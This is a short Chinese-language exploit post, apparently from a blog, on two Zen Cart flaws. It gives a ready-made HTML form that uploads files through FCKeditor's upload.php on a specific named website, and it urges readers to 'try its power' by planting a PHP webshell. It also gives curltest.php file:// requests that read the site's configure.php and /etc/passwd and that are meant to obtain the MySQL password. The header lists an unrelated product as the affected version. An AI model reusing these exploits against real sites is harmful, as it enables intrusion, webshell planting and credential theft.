发布日期:2010-08.30
发布作者:admind
影响版本:Atomic Photo Album 1.0.2
官方地址:www.zen-cart.cn/
漏洞类型:上传漏洞、本地包含
漏洞描述:zen cart 1.38a以下版本存在Fckeditor上传漏洞与curltest.php页存本在文件包含漏洞。
漏洞测试1:
| <form id="frmUpload" enctype="multipart/form-data" action="http://aus-snowboots.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post"> Upload a new file:<br> <input type="file" name="NewFile" size="50"><br> <input id="btnUpload" type="submit" value="Upload"> </form> |
大家试下威力。 直接上传PHP WEBSHELL 到IMAGES
漏洞测试2:Zen Cart 本地文件泄露
得到网页所在路径
/extras/ipn_test_return.php
得到网站配置信息
/extras/curltest.php?url=file:///网站地址/includes/configure.php
读取linux服务器passwd
/extras/curltest.php?url=file:///etc/passwd
拿到MYSQL密码,但是数据库只允许本地链接。。。
没有评论:
发表评论